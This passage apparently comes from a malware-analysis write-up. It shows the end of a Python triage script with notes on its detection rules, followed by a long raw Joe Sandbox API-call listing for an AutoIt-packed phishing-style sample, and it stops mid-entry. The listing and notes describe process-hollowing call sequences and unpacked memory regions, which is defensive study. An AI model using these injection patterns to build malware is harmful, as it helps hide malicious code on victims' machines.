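• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00FE9CCE
• Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
• String ID: YWF3ZQY1TECX8A2F1HBNKNWLM4WE
• Instruction Fuzzy Hash: 93519431D08288DAEF11D7F8C848BDEBBB4AF55304F144199E6487B2C1C6B90B49CBB5
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 00E699A1
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00E699B8
• Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• String ID: aut
• Instruction Fuzzy Hash: 85D05E7954030DAFDB509BA0DC0EFDA773CE704701F4002B1FB98E11A1EAB095988B91
• Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• String ID: AU3!P/$EA06
• Instruction Fuzzy Hash: A0415BE2A041585BCF218B64CA51BFF7FA5AB45304F287079EA46BF1C2C5219DC687A1
"""

if __name__ == "__main__":
    for ref, rule, detail in triage(parse_listing(SAMPLE)):
        print(f"{ref:>8}  {rule:<18}  {detail}")
```

Run against the report text, the "process-injection" hit only says that the three-call prelude sits in one function; confirming hollowing means finding the entry that performs the write, context update and resume, which the report's "Modifies the context of a thread in another process" and "Queues an APC" signatures point at but this section does not list. The "unbacked-code" rule fires for every function in the FE7000 dump because that region has no PE on disk, which is the unpacked stage a memory-dump export or a YARA scan should target rather than the on-disk AutoIt wrapper.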
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 578bdf7dcf946baa010057e16de1e7b98389f88ec66dae2e3eb211c778364b7f
                    • Instruction ID: 1cde6136e0bee771abf69ddb59210d2f571b3810681a3f9824f30bbd2a19db18
                    • Opcode Fuzzy Hash: 578bdf7dcf946baa010057e16de1e7b98389f88ec66dae2e3eb211c778364b7f
                    • Instruction Fuzzy Hash: 77F13B716083019FC714DF28C884A6ABBE5FF88314F54992EF899AB352D731E945CF82
                    APIs
                    • _memset.LIBCMT ref: 00E04401
                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E044A6
                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E044C3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: IconNotifyShell_$_memset
                    • String ID:
                    • API String ID: 1505330794-0
                    • Opcode ID: 09f2216cae8f5a91466572fc517af2a2ee4aa19d56e241c179f8272689d05aed
                    • Instruction ID: df75d29b538b7fc3372aba1d91dc0d09a4c44d2db03adc685a2b244b05c74418
                    • Opcode Fuzzy Hash: 09f2216cae8f5a91466572fc517af2a2ee4aa19d56e241c179f8272689d05aed
                    • Instruction Fuzzy Hash: 6E3171F15047019FD724DF65D984A9BBBF4FB48308F00193EF6AAA2291D7716988CB92
                    APIs
                    • __FF_MSGBANNER.LIBCMT ref: 00E258A3
                      • Part of subcall function 00E2A2EB: __NMSG_WRITE.LIBCMT ref: 00E2A312
                      • Part of subcall function 00E2A2EB: __NMSG_WRITE.LIBCMT ref: 00E2A31C
                    • __NMSG_WRITE.LIBCMT ref: 00E258AA
                      • Part of subcall function 00E2A348: GetModuleFileNameW.KERNEL32(00000000,00EC33BA,00000104,?,00000001,00000000), ref: 00E2A3DA
                      • Part of subcall function 00E2A348: ___crtMessageBoxW.LIBCMT ref: 00E2A488
                      • Part of subcall function 00E2321F: ___crtCorExitProcess.LIBCMT ref: 00E23225
                      • Part of subcall function 00E2321F: ExitProcess.KERNEL32 ref: 00E2322E
                      • Part of subcall function 00E28CA8: __getptd_noexit.LIBCMT ref: 00E28CA8
                    • RtlAllocateHeap.NTDLL(00FB0000,00000000,00000001,00000000,?,?,?,00E20F53,?), ref: 00E258CF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                    • String ID:
                    • API String ID: 1372826849-0
                    • Opcode ID: 103de90dc3f921d5d03c9f1098e747ed1948a3cd1990fb587d486e4ff09eee3c
                    • Instruction ID: 7eca28c3b37be4e4c2c9e2f995d961585ed13f64300b0c33032d5b4353cc7b18
                    • Opcode Fuzzy Hash: 103de90dc3f921d5d03c9f1098e747ed1948a3cd1990fb587d486e4ff09eee3c
                    • Instruction Fuzzy Hash: E601DE33251B31DBD61C2B75FE02A6E7388DF82765B502039F511BA1A2DEB19E414B61
                    APIs
                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00E695F1,?,?,?,?,?,00000004), ref: 00E69964
                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00E695F1,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00E6997A
                    • CloseHandle.KERNEL32(00000000,?,00E695F1,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E69981
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: File$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 3397143404-0
                    • Opcode ID: 54cb1ef6ab6179dc1c144db6f41a79baa7e0e09936e52afaa9ff8f2222440ec9
                    • Instruction ID: 300f88295f6525565550119388659f644b11e817bb6ac987a9564e267e1b7b80
                    • Opcode Fuzzy Hash: 54cb1ef6ab6179dc1c144db6f41a79baa7e0e09936e52afaa9ff8f2222440ec9
                    • Instruction Fuzzy Hash: DDE08632281214BBDB212B95EC0DFDA7B28EB45775F104220FB58B90E187B119259798
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID: CALL
                    • API String ID: 0-4196123274
                    • Opcode ID: bf02ea3a719c590d4f5778c85cfd005357a143ec67c5d801a6608c1b7fb11431
                    • Instruction ID: d02bad6e0c179458829ef8513edb0b817327f1590b4a03a44bbf3fa6cd4498ce
                    • Opcode Fuzzy Hash: bf02ea3a719c590d4f5778c85cfd005357a143ec67c5d801a6608c1b7fb11431
                    • Instruction Fuzzy Hash: 52222A70608305DFD724DF14C494B6AB7E1FF84304F19996DE995AB2A2D731EC85CB82
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: fec14785773fb934df5ac88b5f6b4e5bab1ae592b6166c11810e6679bfdcf995
                    • Instruction ID: 5bc38c57ff4c5a760a38d41c9bdf295c6b16f36b6c4823cf3b300a8c930afc24
                    • Opcode Fuzzy Hash: fec14785773fb934df5ac88b5f6b4e5bab1ae592b6166c11810e6679bfdcf995
                    • Instruction Fuzzy Hash: 2C4127716482159FD720EFA8E9819BEB7F8EF48398B256559F0C5B7283DB309C01CB60
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 7a447dba67378a8f7c08d596f502d4e7aa3d4b1fcc59dbac081316eacd8ee575
                    • Instruction ID: e9a72466267afb14086bda58c1e2e50cc30675efbc3f7fd3830edaf0d467568c
                    • Opcode Fuzzy Hash: 7a447dba67378a8f7c08d596f502d4e7aa3d4b1fcc59dbac081316eacd8ee575
                    • Instruction Fuzzy Hash: BF31CFB1A04506AFD714CF28D9C1E69F3A9FF48324B159629E855CB2D1EB70F8A0CB90
                    APIs
                    • IsThemeActive.UXTHEME ref: 00E04992
                      • Part of subcall function 00E234EC: __lock.LIBCMT ref: 00E234F2
                      • Part of subcall function 00E234EC: DecodePointer.KERNEL32(00000001,?,00E049A7,00E57F9C), ref: 00E234FE
                      • Part of subcall function 00E234EC: EncodePointer.KERNEL32(?,?,00E049A7,00E57F9C), ref: 00E23509
                      • Part of subcall function 00E04A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E04A73
                      • Part of subcall function 00E04A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E04A88
                      • Part of subcall function 00E03B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E03B7A
                      • Part of subcall function 00E03B4C: IsDebuggerPresent.KERNEL32 ref: 00E03B8C
                      • Part of subcall function 00E03B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00EC52F8,00EC52E0,?,?), ref: 00E03BFD
                      • Part of subcall function 00E03B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00E03C81
                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E049D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                    • String ID:
                    • API String ID: 1438897964-0
                    • Opcode ID: cec11211e6e8be17a9365bf2738bebe43af098cf05feac78a1e114daceebf4a4
                    • Instruction ID: f4afca4abebfef74f000de7590e62e468d1eacc4bcb9734d58b5ed9d0927ec0c
                    • Opcode Fuzzy Hash: cec11211e6e8be17a9365bf2738bebe43af098cf05feac78a1e114daceebf4a4
                    • Instruction Fuzzy Hash: 9B118EB25143119FC704DF2AE84590AFBF8FB94750F00452EF455B32B2DB719989CB91
                    APIs
                      • Part of subcall function 00E2588C: __FF_MSGBANNER.LIBCMT ref: 00E258A3
                      • Part of subcall function 00E2588C: __NMSG_WRITE.LIBCMT ref: 00E258AA
                      • Part of subcall function 00E2588C: RtlAllocateHeap.NTDLL(00FB0000,00000000,00000001,00000000,?,?,?,00E20F53,?), ref: 00E258CF
                    • std::exception::exception.LIBCMT ref: 00E20F6C
                    • __CxxThrowException@8.LIBCMT ref: 00E20F81
                      • Part of subcall function 00E2871B: RaiseException.KERNEL32(?,?,?,00EB9E78,00000000,?,?,?,?,00E20F86,?,00EB9E78,?,00000001), ref: 00E28770
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                    • String ID:
                    • API String ID: 3902256705-0
                    • Opcode ID: a14fcb1feb597de80cf3b4e11abe29f721f83360974a0f999b26f04b93f436b2
                    • Instruction ID: 39fecad4628890b2015de66ce05dac0e2084e82bbc75bbc89aa435c77d546d03
                    • Opcode Fuzzy Hash: a14fcb1feb597de80cf3b4e11abe29f721f83360974a0f999b26f04b93f436b2
                    • Instruction Fuzzy Hash: FDF0A93554522D66DF24AB94FD069DE7BEC9F00314F142466FA08B61C3DF708A50C5D1
                    APIs
                      • Part of subcall function 00E28CA8: __getptd_noexit.LIBCMT ref: 00E28CA8
                    • __lock_file.LIBCMT ref: 00E2555B
                      • Part of subcall function 00E26D8E: __lock.LIBCMT ref: 00E26DB1
                    • __fclose_nolock.LIBCMT ref: 00E25566
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                    • String ID:
                    • API String ID: 2800547568-0
                    • Opcode ID: d0c5f737e5c7e9e9c253e3f47a6c624dd0080feb694da75299eb6495994442c8
                    • Instruction ID: ee9e05a23406b9f8b12b93597ca6335eb2553987cb57df683455b9588ce88418
                    • Opcode Fuzzy Hash: d0c5f737e5c7e9e9c253e3f47a6c624dd0080feb694da75299eb6495994442c8
                    • Instruction Fuzzy Hash: A5F0B472942B389ADB107F75BE067AE67E26F40335F14A209F424BB1C1CF7C49419B52
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00FE9243
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00FE92D9
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FE92FB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_fe7000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                    • Instruction ID: 26bd714f109e9902b1121309df74f507af6792a00044f74ea64375e6c6ef8701
                    • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                    • Instruction Fuzzy Hash: 0E12CE24E18658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A4E85CF5A
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 4705d5163adaee709a678a53a4cf15551d0219e71d7391744f87a28c8e337c4f
                    • Instruction ID: 8019fa482b9033a1f46e501e28da40e221528d209a56e4be4c45dca44a86eee3
                    • Opcode Fuzzy Hash: 4705d5163adaee709a678a53a4cf15551d0219e71d7391744f87a28c8e337c4f
                    • Instruction Fuzzy Hash: F431A575A08A12DFD7249F18D590961F7E0FF08360714D56AE9CA9B7E5E730E8C1CB84
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction ID: 3ab1902b6f293ea14d212e9e40365f10b5f5718f04f3c2526a663f7ddba6db4a
                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction Fuzzy Hash: E7310674A01115DFCB18DF48E480969FBB2FF49304B699AA5E409EB392DB30EDC1CB80
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: f408494d2f4956e1c45ba181e0c6e5acfdb143d2f23c76f85deaa986dc2322d6
                    • Instruction ID: f84d8a12da6cbd972edcbd4393a82c2dea01bd1710f813c588c5c6f747dafb77
                    • Opcode Fuzzy Hash: f408494d2f4956e1c45ba181e0c6e5acfdb143d2f23c76f85deaa986dc2322d6
                    • Instruction Fuzzy Hash: C8413A74508351CFDB14DF14C484B1ABBE0BF45318F0998ACE9996B7A2C732EC85CB52
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 91577e4960d67d03373def525d077e516399afc87ca8d05f70d71aac65f84e61
                    • Instruction ID: d72e0f93fb0ea8783908eb00169727e64809488c56befd9910dc4f2f72f25df0
                    • Opcode Fuzzy Hash: 91577e4960d67d03373def525d077e516399afc87ca8d05f70d71aac65f84e61
                    • Instruction Fuzzy Hash: 3E210272A04609EBDB188F16E8857AE7FF4FB14350F21952EE486F51A2EB3094D0CB04
                    APIs
                      • Part of subcall function 00E04D13: FreeLibrary.KERNEL32(00000000,?), ref: 00E04D4D
                      • Part of subcall function 00E253CB: __wfsopen.LIBCMT ref: 00E253D6
                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04F6F
                      • Part of subcall function 00E04CC8: FreeLibrary.KERNEL32(00000000), ref: 00E04D02
                      • Part of subcall function 00E04DD0: _memmove.LIBCMT ref: 00E04E1A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Library$Free$Load__wfsopen_memmove
                    • String ID:
                    • API String ID: 1396898556-0
                    • Opcode ID: ee60846ba517f4c92f5117840e829d99c07b2fd758860423fa4843051e19b7b9
                    • Instruction ID: 24c33530d46c507136635d204cc38036cb947b49b95fe97294ce34a3100e3c69
                    • Opcode Fuzzy Hash: ee60846ba517f4c92f5117840e829d99c07b2fd758860423fa4843051e19b7b9
                    • Instruction Fuzzy Hash: 0A11E7F2700206AADB10FF70DD56FAEB7E99F40710F10A829FA41B61C1DA719A55DB50
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: 07aba6574832283db518e8b17cf78a67b70f395c6eb7810e1ab0fd3f75d92616
                    • Instruction ID: 132bc56388db2e885cc9ec041899e93cc66a89f24526ef8dcd1850eb88e57fe8
                    • Opcode Fuzzy Hash: 07aba6574832283db518e8b17cf78a67b70f395c6eb7810e1ab0fd3f75d92616
                    • Instruction Fuzzy Hash: 0C214470508301CFDB14DF14C444A5ABBE0BF88318F08996CE99A677A2C731E886CB92
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 1c38cca95f6358379de2d9c40b720d035e2a3922818e7d4ef8cb35a2f7d1b5e5
                    • Instruction ID: 104f999549d5e261e7272af8392a3e55114e1ab296392ae22705e6985965ea02
                    • Opcode Fuzzy Hash: 1c38cca95f6358379de2d9c40b720d035e2a3922818e7d4ef8cb35a2f7d1b5e5
